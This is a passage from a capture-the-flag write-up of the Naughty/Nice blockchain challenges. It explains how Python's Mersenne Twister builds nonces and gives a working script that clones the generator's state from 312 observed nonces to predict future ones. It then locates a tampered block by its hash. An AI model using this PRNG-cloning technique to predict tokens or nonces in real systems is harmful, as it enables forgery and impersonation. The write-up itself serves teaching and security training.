values. In our case, there are two words (two 32-bit words = one 64-bit nonce).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;#if PY_LITTLE_ENDIAN&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;words&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="o"&gt;-=&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="cp"&gt;#else&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;words&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="o"&gt;-=&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="cp"&gt;#endif&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Depending on the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Endianness"&gt;endianness&lt;/a&gt;, it
will generate the least or most significant bits first.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;genrand_uint32&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="cm"&gt;/* Drop least significant bits */&lt;/span&gt;
    &lt;span class="n"&gt;wordarray&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It generates a 32-bit random value with &lt;code&gt;genrand_uint32&lt;/code&gt; (our Mersenne
Twister), and store it into our word-array. It does so until every word has
been generated. It handles the case where &lt;code&gt;k&lt;/code&gt; is not a multiple of 32,
but it does not concern us (since &lt;code&gt;k=64=2*32&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;In conclusion, our 64-bit nonces are created by calling our Mersenne Twister
twice and concatenating our two 32-bit integers. The order of concatenation
depends on the endianness. Let's check on our machine:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;r1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Random&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# We create two random generators, with the same seed&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;r2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Random&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;hex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;randrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mh"&gt;0XFFFFFFFFFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="c1"&gt;# This create a nonce, just like in the blockchain code&lt;/span&gt;
&lt;span class="go"&gt;&amp;#39;0x629f6fbed82c07cd&amp;#39;&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;hex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r2&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getrandbits&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="c1"&gt;# Here, we call the Mersenne Twister twice&lt;/span&gt;
&lt;span class="go"&gt;&amp;#39;0xd82c07cd&amp;#39;&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;hex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r2&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getrandbits&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="go"&gt;&amp;#39;0x629f6fbe&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that our nonce is the concatenation of our two Mersenne Twister
generated integers. The first integer is used in the least significant bits.&lt;/p&gt;
&lt;p&gt;If we need 624 integers to reconstruct our Mersenne Twister internal state,
we only need half of that of nonces (so 312 nonces). Do we have enough nonces
in our blockchain?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;naughty_nice&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;blockchain.dat&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;1548&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There are 1548 blocks in the chain, each with a nonce. This means 1548 nonces,
and therefore 3096 Mersenne Twister generated integers. More than enough to
reconstruct our internal state!&lt;/p&gt;
&lt;p&gt;To help us in our task, Tom Liston (from the KringleCon talk) created a simple
Python library that reimplements the Mersenne Twister in pure Python, with
an untampering function. You can find it &lt;a class="reference external" href="https://github.com/tliston/mt19937"&gt;here on GitHub&lt;/a&gt;.
Now, we have everything we need to generate future nonces in our blockchain!&lt;/p&gt;
&lt;p&gt;The id of our lost block in the chain is 129996. Let's say we want to find the
nonce value for block #130000. We have to generate four additional nonces.&lt;/p&gt;
&lt;p&gt;Here's our source code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;
&lt;span class="c1"&gt;# File predict_nonces.py&lt;/span&gt;

&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;naughty_nice&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;mt19937.mt19937&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;mt19937&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;untemper&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;nonce_2_words&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;word_msb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFFFFFFFF&lt;/span&gt;
    &lt;span class="n"&gt;word_lsb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;nonce&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mh"&gt;0xFFFFFFFF&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;word_msb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;word_lsb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;words_2_nonce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;word_msb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;word_lsb&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;nonce&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;word_msb&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;word_lsb&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;nonce&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;generate_nonce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mt&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;lsb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;mt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;extract_number&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;msb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;mt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;extract_number&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;words_2_nonce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;msb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;lsb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;blockchain.dat&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;mt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;mt19937&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# This will hold our cloned Mersenne Twister&lt;/span&gt;

    &lt;span class="c1"&gt;# For every block in the begining of the chain&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;312&lt;/span&gt;&lt;span class="p"&gt;]):&lt;/span&gt;
        &lt;span class="c1"&gt;# We extract the two words generated by the Mersenne Twister&lt;/span&gt;
        &lt;span class="n"&gt;msb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;lsb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;nonce_2_words&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="c1"&gt;# We untamper them and store them in our new Mersenne Twister&lt;/span&gt;
        &lt;span class="n"&gt;mt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;MT&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;untemper&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lsb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;mt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;MT&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;untemper&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;msb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# For every remaining block&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;test_b&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;312&lt;/span&gt;&lt;span class="p"&gt;:]:&lt;/span&gt;
        &lt;span class="c1"&gt;# We test it the predicted nonce matches the actual nonce&lt;/span&gt;
        &lt;span class="n"&gt;actual_nonce&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;test_b&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt;
        &lt;span class="n"&gt;predicted_nonce&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;generate_nonce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;assert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;actual_nonce&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;predicted_nonce&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# We generate four blocks to determine the nonce for block #130000&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;predicted_nonce&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;generate_nonce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Predicted nonce for block #{}: {:016x}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;129997&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;predicted_nonce&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's run our program:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./predict_nonces.py
&lt;span class="go"&gt;Predicted nonce for block #129997: b744baba65ed6fce&lt;/span&gt;
&lt;span class="go"&gt;Predicted nonce for block #129998: 01866abd00f13aed&lt;/span&gt;
&lt;span class="go"&gt;Predicted nonce for block #129999: 844f6b07bd9403e4&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Predicted nonce for block #130000: 57066318f32f729d&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Block #130000 will have a nonce equal to &lt;code&gt;57066318f32f729d&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="naughty-nice-list-with-blockchain-investigation-part-2"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id46"&gt;Naughty/Nice List with Blockchain Investigation Part 2&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, Jack Frost managed to modify the blockchain, to get a perfect
nice score. Given the character, this is raising eyebrows. We're told that
its block has a SHA256 sum of &lt;code&gt;58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&lt;/code&gt;.
Let's find Jack's block.&lt;/p&gt;
&lt;p&gt;First, we save every block to a file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;naughty_nice&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;blockchain.dat&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;)):&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;    &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;save_a_block&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;./blocks/block_{}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="gp"&gt;...&lt;/span&gt;
&lt;span class="go"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then we compute the SHA256 sum of every block, and find our match:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; sha256sum ./blocks/* &lt;span class="p"&gt;|&lt;/span&gt; grep 58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f
&lt;span class="go"&gt;58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f  ./blocks/block_1010&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, Jack's block is at offset 1010 in the chain. Let's study it a little bit:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1010&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="go"&gt;Chain Index: 129459&lt;/span&gt;
&lt;span class="go"&gt;              Nonce: a9447e5771c704f4&lt;/span&gt;
&lt;span class="go"&gt;                PID: 0000000000012fd1&lt;/span&gt;
&lt;span class="go"&gt;                RID: 000000000000020f&lt;/span&gt;
&lt;span class="go"&gt;     Document Count: 2&lt;/span&gt;
&lt;span class="go"&gt;              Score: ffffffff (4294967295)&lt;/span&gt;
&lt;span class="go"&gt;               Sign: 1 (Nice)&lt;/span&gt;
&lt;span class="go"&gt;         Data item: 1&lt;/span&gt;
&lt;span class="go"&gt;               Data Type: ff (Binary blob)&lt;/span&gt;
&lt;span class="go"&gt;             Data Length: 0000006c&lt;/span&gt;
&lt;span class="go"&gt;                    Data: b&amp;#39;ea465340303a6079d3df2762be68467c27f046d3a7ff4e92dfe1def7407f2a7b73e1b759b8b919451e37518d22d987296fcb0f188dd60388bf20350f2a91c29d0348614dc0bceef2bcadd4cc3f251ba8f9fbaf171a06df1e1fd8649396ab86f9d5118cc8d8204b4ffe8d8f09&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;         Data item: 2&lt;/span&gt;
&lt;span class="go"&gt;               Data Type: 05 (PDF)&lt;/span&gt;
&lt;span class="go"&gt;             Data Length: 00009f57&lt;/span&gt;
&lt;span class="go"&gt;                    Data: b&amp;#39;255044462d312e[snip]&lt;/span&gt;
&lt;span class="go"&gt;               Date: 03/24&lt;/span&gt;
&lt;span class="go"&gt;               Time: 13:21:41&lt;/span&gt;
&lt;span class="go"&gt;       PreviousHash: 4a91947439046c2dbaa96db38e924665&lt;/span&gt;
&lt;span class="go"&gt;  Data Hash to Sign: 347979fece8d403e06f89f8633b5231a&lt;/span&gt;
&lt;span class="go"&gt;          Signature: b&amp;#39;MJIxJy2iFXJRCN1EwDsqO9NzE2Dq1qlvZuFFlljmQ03+erFpqqgSI1xhfAwlfmI2MqZWXA9RDTVw3+aWPq2S0CKuKvXkDOrX92cPUz5wEMYNfuxrpOFhrK2sks0yeQWPsHFEV4cl6jtkZ//OwdIznTuVgfuA8UDcnqCpzSV9Uu8ugZpAlUY43Y40ecJPFoI/xi+VU4xM0+9vjY0EmQijOj5k89/AbMAD2R3UbFNmmR61w7cVLrDhx3XwTdY2RCc3ovnUYmhgPNnduKIUA/zKbuu95FFi5M2r6c5Mt6F+c9EdLza24xX2J4l3YbmagR/AEBaF9EBMDZ1o5cMTMCtHfw==&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that Jack's block effectively has a perfect score of
&lt;code&gt;0xffffffff&lt;/code&gt;, with a naughty/nice sign equal to 1 (meaning &amp;quot;Nice&amp;quot;). His
block also has two documents: one binary blob with what seems to be random
data, and a PDF. Let's extract the latter:&lt;/p&gt;
